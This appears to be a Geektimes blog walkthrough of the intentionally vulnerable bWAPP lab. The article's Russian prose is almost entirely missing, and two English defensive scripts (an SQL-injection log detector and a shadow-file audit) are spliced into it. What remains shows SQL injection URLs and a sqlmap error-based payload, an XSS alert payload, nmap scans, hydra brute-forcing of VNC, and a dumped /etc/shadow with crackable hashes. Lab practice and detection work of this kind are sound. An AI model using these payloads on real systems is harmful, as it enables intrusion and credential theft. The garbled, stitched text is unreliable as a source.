Geektimes
@Mach1ne
14 2015 15:35
- OWASP Top-10
bWAPP
- *, *
, !
- ( ), OWASP Top-10,
bWAPP.
:
Open Web Application Security Project (OWASP) -. OWASP
, . , , ,
, . -10
-, -.
-10 :
A1
A2
A3 (XSS)
A4
A5
A6
A7
A8 (CSRF)
A9
A10
, .
buggy web application (bWAPP) -, . , 100
, -10 OWASP. - .
bWAPP Malik Mesellem ( )
:
, , .
bwapp , .
:
, - ( :)), , ,
-.
:
, bWAPP.
, .
:
/ . -.
:)
WARNING!
:
1. - .
2. , .
/ .
// .
SQL-injection
SQL Injection (GET/Search)
, . , Hulk.
, :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk&action=search
order by :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20order%20by%2010%20--%20&action=search
7:
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20order%20by%207%20--%20&action=search
union:
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20union%20select%201,2,3,4,5,6,7%20from%20users%20--%20&action=search
, , :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20union%20select%201,database%28%29,user%28%29,4,password,6,7%20from%20users%20--%20&action=search
, , Request .txt .
sqlmap :
sqlmap -r sql.txt
sqlmap , , , , :
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: title=hulk%' AND (SELECT 2135 FROM(SELECT COUNT(*),CONCAT(0x7178766a71,(SELECT (CASE WHEN (2135=2135) THEN 1 ELSE 0 END)),0x7162767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&action=search
payload :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%' AND (SELECT 2135 FROM(SELECT COUNT(*),CONCAT(0x7178766a71,(SELECT (CASE WHEN (2135=2135) THEN 1 ELSE 0 END)),0x7162767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&action=search
, , :
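From the defender's side, the three stages shown above (quote plus ORDER BY to count columns, UNION SELECT to pull rows, and the error-based subquery that sqlmap settled on) each leave a recognisable trace in the query string of the access log. The script below is an added example, not part of the original article or of bWAPP: it percent-decodes each parameter until the value is stable (so a double-encoded payload is normalised too) and reports which indicators it matches. The sample request targets are the URLs from this page, re-encoded the way a browser or sqlmap would send them; the log format and the indicator names are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample of request targets as they would appear in the web server's
# access log: the bWAPP requests shown on this page plus the sqlmap payload,
# percent-encoded the way a browser or sqlmap sends them (log format assumed).
SAMPLE_REQUESTS = [
    "/bWAPP/sqli_1.php?title=hulk&action=search",
    "/bWAPP/sqli_1.php?title=hulk%27%20order%20by%2010%20--%20&action=search",
    "/bWAPP/sqli_1.php?title=hulk%27%20union%20select%201,2,3,4,5,6,7%20from%20users%20--%20&action=search",
    "/bWAPP/sqli_1.php?title=hulk%27%20union%20select%201,database%28%29,user%28%29,4,password,6,7"
    "%20from%20users%20--%20&action=search",
    "/bWAPP/sqli_1.php?title=hulk%25%27%20AND%20(SELECT%202135%20FROM(SELECT%20COUNT(*),"
    "CONCAT(0x7178766a71,(SELECT%20(CASE%20WHEN%20(2135=2135)%20THEN%201%20ELSE%200%20END)),"
    "0x7162767071,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)"
    "%20AND%20'%25'='&action=search",
]

# Indicators are checked against the fully decoded, lower-cased parameter value.
# Each one corresponds to a stage of the injection walkthrough on this page.
INDICATORS = [
    ("column-count probe", re.compile(r"['\"]\s*order\s+by\s+\d+")),
    ("union-based extraction", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("boolean/error-based subquery", re.compile(r"\band\s*\(\s*select\b")),
    ("comment terminator", re.compile(r"(--\s|#|/\*)")),
    ("schema function call", re.compile(r"\b(database|user|version)\s*\(\s*\)")),
    ("hex-encoded string literal", re.compile(r"\b0x[0-9a-f]{4,}\b")),
]


def decode_param(value: str) -> str:
    """Percent-decode until the value stops changing, so double encoding is normalised."""
    previous = None
    while previous != value:
        previous, value = value, unquote_plus(value)
    return value.lower()


def classify_request(target: str) -> dict:
    """Map each query parameter of a request target to the indicator names it matches."""
    findings = {}
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = decode_param(raw)  # parse_qsl decoded once; finish the job
        hits = [label for label, rx in INDICATORS if rx.search(decoded)]
        if hits:
            findings[name] = hits
    return findings


def scan(targets) -> list:
    """Return (target, findings) for every request that tripped at least one indicator."""
    flagged = []
    for target in targets:
        findings = classify_request(target)
        if findings:
            flagged.append((target, findings))
    return flagged


if __name__ == "__main__":
    for target, findings in scan(SAMPLE_REQUESTS):
        print(target[:60], "->", findings)
```

Run over the sample, the benign search is silent and the four injection requests are flagged with the stage they belong to; because decoding is repeated until stable, a request such as `title=hulk%2527%2520order%2520by%25207` is classified the same way as the plainly encoded one. A rule like this belongs in a WAF or log pipeline as a trigger for review, not as a substitute for parameterised queries in the application itself.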
XSS?
.
XSS Reflected (GET)
<script>alert(1);</script>
/etc/passwd:
/etc/:
boot2root ( bWAPP) ,
.
nmap':
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
666/tcp  open  doom
3306/tcp open  mysql
5901/tcp open  vnc-1
6001/tcp open  X11:1
8080/tcp open  http-proxy
8443/tcp open  https-alt
9080/tcp open  glrpc
FTP
Dirbuster:
nmap --script=ftp*
, :
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.1
| -rw-rw-r--   1 root     www-data   543803 Nov  2 22:52 Iron_Man.pdf
| -rw-rw-r--   1 root     www-data   462949 Nov  2 22:52 Terminator_Salvation.pdf
| -rw-rw-r--   1 root     www-data   544600 Nov  2 22:52 The_Amazing_Spider-Man.pdf
| -rw-rw-r--   1 root     www-data   526187 Nov  2 22:52 The_Cabin_in_the_Woods.pdf
| -rw-rw-r--   1 root     www-data   756522 Nov  2 22:52 The_Dark_Knight_Rises.pdf
| -rw-rw-r--   1 root     www-data   618117 Nov  2 22:52 The_Incredible_Hulk.pdf
|_-rw-rw-r--   1 root     www-data  5010042 Nov  2 22:52 bWAPP_intro.pdf
, , ftp http, ? :)
VNC
192.168.1.18:5901
, hydra:
! , root'.
root, /etc/shadow
root:$1$6.aigTP1$FC1TuoITEYSQwRV0hi6gj/:15792:0:99999:7:::
bee:$1$tJB0ndAJ$0d42BkRQ7vebj/bE5RdQH1:15792:0:99999:7:::
neo:$1$fSorv0ad$56lfF9qd8o4caaSB6dVqi/:15897:0:99999:7:::
alice:$1$yRUOVrYB$9f4TMaym/xOSeGbmsgFGI/:15897:0:99999:7:::
thor:$1$Iy6Mvuaz$FzcNXTQ668kDD5LY.ObdL/:15897:0:99999:7:::
wolverine:$1$PUGlrXi8$oXOwDBaAzxtgXh10Xkw9i/:15897:0:99999:7:::
johnny:$1$uqzKnduQ$MPxhWXcf2FFQarhO95d5y/:15897:0:99999:7:::
selene:$1$BHZLob3h$mru35IhZzRdnfTHOADrkJ0:15897:0:99999:7:::
hashcat' :
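Every account in the shadow file above uses the `$1$` prefix, i.e. MD5-crypt, a fast legacy scheme, and the aging field is 99999 days, so the passwords never expire. Both are things a hardening audit should catch before anyone reaches for a cracker. The script below is an added example, not code from the article or from bWAPP: it parses shadow lines, identifies the crypt(3) scheme from the `$id$` prefix, and reports weak schemes, empty passwords and missing expiry. The embedded data is a copy of the entries shown above; the scheme table and the thresholds are this example's own assumptions.

```python
# Constructed copy of the /etc/shadow entries shown on this page (bWAPP VM).
SHADOW_SAMPLE = """\
root:$1$6.aigTP1$FC1TuoITEYSQwRV0hi6gj/:15792:0:99999:7:::
bee:$1$tJB0ndAJ$0d42BkRQ7vebj/bE5RdQH1:15792:0:99999:7:::
neo:$1$fSorv0ad$56lfF9qd8o4caaSB6dVqi/:15897:0:99999:7:::
alice:$1$yRUOVrYB$9f4TMaym/xOSeGbmsgFGI/:15897:0:99999:7:::
thor:$1$Iy6Mvuaz$FzcNXTQ668kDD5LY.ObdL/:15897:0:99999:7:::
wolverine:$1$PUGlrXi8$oXOwDBaAzxtgXh10Xkw9i/:15897:0:99999:7:::
johnny:$1$uqzKnduQ$MPxhWXcf2FFQarhO95d5y/:15897:0:99999:7:::
selene:$1$BHZLob3h$mru35IhZzRdnfTHOADrkJ0:15897:0:99999:7:::
"""

# crypt(3) scheme identifiers (the part between the first two '$').
# "1" is MD5-crypt, the fast legacy scheme used by every account above.
HASH_SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
                "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
WEAK_SCHEMES = {"md5crypt", "descrypt"}   # assumption: what this audit treats as weak
MAX_AGE_DAYS = 99999                     # shadow(5) value meaning "never expires"


def parse_shadow(text: str) -> list:
    """Parse shadow-format lines into dicts with user, hash scheme and max password age."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        user, pw, _lastchg, _min, max_days, _warn, _inact, _expire, _ = fields
        if pw == "":
            scheme = "empty"                       # no password required at all
        elif pw.startswith(("!", "*")):
            scheme = "locked"                      # account cannot log in with a password
        elif pw.startswith("$"):
            scheme = HASH_SCHEMES.get(pw.split("$")[1], "unknown")
        else:
            scheme = "descrypt"                    # traditional 13-char DES hash, no prefix
        entries.append({"user": user, "scheme": scheme,
                        "max_days": int(max_days) if max_days else None})
    return entries


def audit_shadow(text: str) -> dict:
    """Return {user: [problems]} for accounts that fail the policy checks."""
    findings = {}
    for entry in parse_shadow(text):
        problems = []
        if entry["scheme"] in WEAK_SCHEMES:
            problems.append(f"weak hash scheme ({entry['scheme']})")
        if entry["scheme"] == "empty":
            problems.append("empty password")
        if entry["scheme"] not in ("locked",) and (
                entry["max_days"] is None or entry["max_days"] >= MAX_AGE_DAYS):
            problems.append("password never expires")
        if problems:
            findings[entry["user"]] = problems
    return findings


if __name__ == "__main__":
    for user, problems in audit_shadow(SHADOW_SAMPLE).items():
        print(f"{user}: {', '.join(problems)}")
```

On the sample every one of the eight accounts is reported twice over (MD5-crypt and no expiry); on a host that has been migrated to `$6$` or `$y$` hashes with a sane `PASS_MAX_DAYS` the same script returns an empty dict, which makes it usable as a configuration check in a CI or compliance pipeline.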
bWAPP Malik Mesellem ( )
-10 OWASP
@BeLove
, @BeLove
g0tmi1k , boot2root
, 5
. .
, , .
0
, , Beast/crime/breach?
, , , bwapp' , , .
pentesterlab
bWAPP'a, 2 , ( ) cheatsheet', .
.
. , 40 , - ,
.
0
xss - / - (.. ).
CTF (cutycapt ).
, (ruby/java/python). php :)
+2
bWAPP. :)
OWASP .
+1
, , . , , .
. , .